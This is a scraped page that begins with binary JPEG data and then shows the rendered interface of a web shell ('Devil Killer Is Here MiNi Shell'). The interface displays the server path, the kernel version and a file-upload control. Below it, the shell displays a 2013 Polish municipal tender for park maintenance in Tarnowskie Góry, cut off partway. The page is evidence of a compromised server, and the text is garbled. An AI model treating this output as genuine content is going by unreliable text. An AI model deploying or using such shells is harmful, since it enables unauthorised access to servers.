JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130412/55719-N-2013.html

<p class="kh_header"><b>Tarnowskie Góry: Utrzymanie zieleni i infrastruktury oraz ścinanie drzew na terenie Parku w Reptach Śląskich oraz przy ul. Lipowej w Tarnowskich Górach - trzy zadania</b><br>
<b>Numer ogłoszenia: 55719 - 2013; data zamieszczenia: 12.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Tarnowskie Góry , Rynek 4, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3933600, 3933855, faks 032 3933602.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.tarnowskiegory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni i infrastruktury oraz ścinanie drzew na terenie Parku w Reptach Śląskich oraz przy ul. Lipowej w Tarnowskich Górach - trzy zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca Utrzymanie zieleni i infrastruktury oraz ścinanie drzew w Parku w Reptach Śląskich - Tarnowskich Górach w 2013-2014 roku, w tym:
koszenie łąk parkowych na pow. 5,60 ha, koszenie trawników parkowych na pow. 2,10 ha, koszenie trawy, chwastów i jednorocznych samosiewów na terenie parku na pow. 24170 m2, pielęgnacja krzewów żywopłotowych pow. 1581 m2, pielęgnacjakwietników bylinowych pow. 342,35 m2,wyłożenie feromonów do zwalczania kornika drukarza i szrotówka kasztanowcowniczka 2 razy po 125 sztuk, czyszczenie terenu z podrostu, czyszczenie wczesne, zwalczanie rdestowca pow. łączna 5,20 ha, konserwacja rowów melioracyjnych i przepustów o długości łącznej1227,30 m, wycinka drzew iglastych i liściastych 119 szt. łącznie z wyrobem drewna wg sortymentów w ilości188 m3, oczyszczanie alejek parkowych, parkingów i schodów z liści i innych nieczystości na pow. łącznej 33688 m2, oczyszczanie alejek parkowych i terenu wzdłuż alejek parkowych z różnego rodzaju nieczystości i gałęzi na pow. łącznej 87,40 ha zgodnie z załączonym przedmiarem i opisem przedmiotu zamówienia. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 Opis przedmiotu zamówienia i stanowi integralną część siwz.
Zadanie nr 2
Przedmiotem zamówienia jest usługa obejmująca wykonanie zabiegów pielęgnacyjno konserwacyjnych starodrzewu na terenie zabytkowego Parku w Reptach Śląskich polegających na wykonaniu cięć sanitarnych, formujących i technicznych 101 szt. drzew różnych gatunków, w tym 88 szt. rosnących w obrębie Parku w Reptach głównie wzdłuż alejek parkowych oraz 13 sztuk drzew stanowiących pozostałość alei kasztanowej przy ul. Repeckiej 102 zgodnie z załączonym przedmiarem robót i opisem przedmiotu zamówienia. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 Opis przedmiotu zamówienia i stanowi integralną część siwz.
Zadanie nr 3
Przedmiotem zamówienia jest usługa obejmująca wykonanie zabiegów pielęgnacyjno-konserwacyjnych starodrzewu zabytkowej alei lipowej przy ul. Lipowej w Tarnowskich Górach polegających na wykonaniu cięć sanitarnych i formujących 13 sztuk drzew wchodzących w skład starodrzewu alei lipowej zgodnie z załączonym przedmiarem robót i opisem przedmiotu zamówienia.
Szczegółowy opis przedmiotu zamówienia znajduje sięw załączniku nr 1 Opis przedmiotu zamówienia i stanowi integralną część siwz.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.21.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości:
Zadanie nr 1: 2.000,00 zł,
Zadanie nr 2: 700,00 zł
Zadanie nr 3 - nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie nr 1  Aktualnej  decyzji właściwego starosty w zakresie transportu odpadów uwzględnionych w opisie przedmiotu zamówienia lub wpisu do rejestru podmiotów gospodarujących odpadami prowadzonego przez właściwego marszałka województwa, zgodnie z ustawą o odpadach z 14  grudnia 2012 r. ( Dz.U. z 2013 r., poz. 21), Wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2012 r. poz. 391 z późn. zm.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia niezbędnego do wykonania przedmiotu zamówienia polegającym na wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: Zadanie nr 1: co najmniej jednej usługi obejmującej koszenie łąk i trawników, cięcie żywopłotów, czyszczenie terenu z podrostu lub czyszczenie wczesne i ścinanie drzew. Wartość wykazanej usługi nie może być mniejsza niż 30.000,00 zł (brutto). Zadanie nr 2: co najmniej jednej usługi obejmującej swym zakresem konserwację parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej. Wartość wykazanej usługi nie może być mniejsza niż 10.000,00 zł (brutto). Zadanie nr 3: co najmniej jednej usługi obejmującej swym zakresem konserwację parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej. Wartość wykazanej usługi nie może być mniejsza niż 4.000,00 zł (brutto)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się dysponowaniem n/w sprzętem  do wykonania zamówienia tj.
Zadanie nr 1: samochodem samowyładowczym lub skrzyniowym do 5 ton - 1szt., ciągnikiem kołowym z przyczepą - 1szt, nożycami spalinowymi do żywopłotu - 2szt., kosiarką spalinową na wysięgniku - 1szt., kosiarką spalinową samojezdną -  1szt., kosiarką rotacyjno-ciągnioną - 1szt., piłą spalinową - 2szt., rębarką - 1szt.
Zadanie nr 2: samochodem samowyładowczym lub skrzyniowym do 5 ton - 1szt., ciągnikiem kołowym z przyczepą - 1szt., piłą spalinową - 2 szt., podnośnikiem - 1 szt., rębarką - 1 szt. 
Zadanie nr 3: samochodem samowyładowczym lub skrzyniowym do 5 ton - 1szt., ciągnikiem kołowym z przyczepą - 1szt., piłą spalinową - 2 szt., podnośnikiem - 1 szt., rębarką  - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż będzie dysponować co najmniej : jednym pracownikiem o udokumentowanym wykształceniu min. średnim ogrodniczym lub leśnym, który będzie bezpośrednio kierował robotami na terenie objętym przedmiotem zamówienia - kierownik robót, trzema pilarzami z udokumentowanymi uprawnieniami.
Zadanie nr 2: jednym pracownikiem o udokumentowanych kwalifikacjach określonych w § 23.1 lub § 31 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. (Dz.U. z 2011r., Nr 165, poz. 987), który będzie bezpośrednio kierował robotami na terenie objętym przedmiotem zamówienia - kierownik robót, w tym:
a) kwalifikacje zgodne z § 23. 1 rozporządzenia - tytuł zawodowy magistra lub magistra inżyniera uzyskany po ukończeniu studiów wyższych, obejmujących wiadomości w zakresie prac konserwatorskich oraz prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków wpisanych do rejestru zabytków albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków, oraz odbyły po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków,
b) kwalifikacje zgodne z § 31 rozporządzenia - zaświadczenie wydane przez konserwatora zabytków o posiadaniu kwalifikacji na prowadzenie prac konserwatorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków wpisanych do rejestru zabytków albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków; dwoma pilarzami o udokumentowanych kwalifikacjach określonych w  § 23.2 lub § 31 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. (Dz.U. z 2011 r., Nr 165,  poz. 987) w tym:
a) kwalifikacje zgodne z § 23.2 rozporządzenia - prace o charakterze technicznym polegające na konserwacji parków wpisanych do rejestru zabytków mogą być prowadzone przez osoby, które posiadają świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w  zawodach związanych z pielęgnacją zieleni, albo odbyły co najmniej 12-miesięczną praktykę zawodową przy pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków.
b) kwalifikacje zgodne z § 31 rozporządzenia - zaświadczenie wydane przez konserwatora zabytków na wykonywanie prac o charakterze technicznym przy konserwacji parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej.
Zadanie nr 3: jednym pracownikiem o udokumentowanych kwalifikacjach określonych w § 23.1 lub § 31 Rozporządzenia Ministra Kultury i Dziedzictwa  Narodowego z dnia 27 lipca 2011r. (Dz.U. z 2011r., Nr 165, poz. 987), który będzie bezpośrednio kierował robotami na terenie objętym przedmiotem zamówienia - kierownik robót, w tym:

a) kwalifikacje zgodne z § 23. 1 rozporządzenia - tytuł zawodowy magistra lub magistra inżyniera uzyskany po ukończeniu studiów wyższych, obejmujących wiadomości w zakresie prac konserwatorskich oraz prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków wpisanych do rejestru zabytków albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków, oraz odbyły po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków, b) kwalifikacje zgodne z § 31 rozporządzenia - zaświadczenie wydane przez konserwatora zabytków o posiadaniu kwalifikacji na prowadzenie prac konserwatorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków wpisanych do rejestru zabytków albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków; dwoma pilarzami o udokumentowanych kwalifikacjach określonych w § 23.2 lub § 31 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. (Dz.U. z 2011 r., Nr 165,  poz. 987), w tym:
a) kwalifikacje zgodne z  § 23.2 rozporządzenia - prace o charakterze technicznym polegające na konserwacji parków wpisanych do rejestru zabytków mogą być prowadzone przez osoby, które posiadają świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w  zawodach związanych z pielęgnacją zieleni, albo odbyły co najmniej 12-miesięczną praktykę zawodową przy pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków.
b) kwalifikacje zgodne z § 31 rozporządzenia - zaświadczenie wydane przez konserwatora zabytków na wykonywanie prac o charakterze technicznym przy konserwacji parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zadanie nr 1: co najmniej jednej usługi obejmującej koszenie łąk i trawników, cięcie żywopłotów, czyszczenie terenu z podrostu lub czyszczenie wczesne i ścinanie drzew. Wartość wykazanej usługi nie może być mniejsza niż 30.000,00 zł (brutto).
Zadanie nr 2:
co najmniej jednej usługi obejmującej swym zakresem konserwację parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej.
Wartość wykazanej usługi nie może być mniejsza niż 10.000,00 zł (brutto).
Zadanie nr 3:
co najmniej jednej usługi obejmującej swym zakresem konserwację parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej.
Wartość wykazanej usługi nie może być mniejsza niż 4.000,00 zł (brutto);</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz Oferta oraz Przedmiar</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach: ceny ofertowej - w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki, zmiany osób wyznaczonych przez Zamawiającego i Wykonawcę do nadzorowania i kontaktów roboczych w trakcie realizacji zamówienia. Osoby wyznaczone i wpisane do umowy jako osoby nadzorujące lub współpracujące w zakresie realizacji przedmiotu zamówienia mogą być zmienione zarówno przez Zamawiającego jak i Wykonawcę - w przypadku Wykonawcy zmiana osoby może nastąpić przy założeniu, że dana osoba będzie posiadać  uprawnienia wymagane w specyfikacji. Zmiana osób wyznaczonych do współpracy może nastąpić po uprzednim pisemnym zawiadomieniu strony przeciwnej. Zmiana nie wymaga akceptacji strony przeciwnej. Zamawiający przewiduje również możliwość zmiany postanowień umowy w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip. tarnowskiegory.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2013 godzina 10:00, miejsce: Urząd Miejski, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie zieleni i infrastruktury oraz ścinanie drzew w Parku w Reptach Śląskich - Tarnowskich Górach w 2013-2014 roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca Utrzymanie zieleni i infrastruktury oraz ścinanie drzew w Parku w Reptach Śląskich - Tarnowskich Górach w 2013-2014 roku, w tym:
koszenie łąk parkowych na pow. 5,60 ha, koszenie trawników parkowych na pow. 2,10 ha, koszenie trawy, chwastów i jednorocznych samosiewów na terenie parku na pow. 24170 m2, pielęgnacja krzewów żywopłotowych pow. 1581 m2, pielęgnacjakwietników bylinowych pow. 342,35 m2,wyłożenie feromonów do zwalczania kornika drukarza i szrotówka kasztanowcowniczka 2 razy po 125 sztuk, czyszczenie terenu z podrostu, czyszczenie wczesne, zwalczanie rdestowca pow. łączna 5,20 ha, konserwacja rowów melioracyjnych i przepustów o długości łącznej1227,30 m, wycinka drzew iglastych i liściastych 119 szt. łącznie z wyrobem drewna wg sortymentów w ilości188 m3, oczyszczanie alejek parkowych, parkingów i schodów z liści i innych nieczystości na pow. łącznej 33688 m2, oczyszczanie alejek parkowych i terenu wzdłuż alejek parkowych z różnego rodzaju nieczystości i gałęzi na pow. łącznej 87,40 ha zgodnie z załączonym przedmiarem i opisem przedmiotu zamówienia. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 Opis przedmiotu zamówienia i stanowi integralną część siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.21.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zabiegi pielęgnacyjno konserwacyjne starodrzewu na terenie zabytkowego Parku w Reptach Śląskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca wykonanie zabiegów pielęgnacyjno konserwacyjnych starodrzewu na terenie zabytkowego Parku w Reptach Śląskich polegających na wykonaniu cięć sanitarnych, formujących i technicznych 101 szt. drzew różnych gatunków, w tym 88 szt. rosnących w obrębie Parku w Reptach głównie wzdłuż alejek parkowych oraz 13 sztuk drzew stanowiących pozostałość alei kasztanowej przy ul. Repeckiej 102 zgodnie z załączonym przedmiarem robót i opisem przedmiotu zamówienia. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 Opis przedmiotu zamówienia i stanowi integralną część siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zabiegi pielęgnacyjno konserwacyjne starodrzewu alei lipowej przy ul. Lipowej w Tarnowskich Górach.</p>
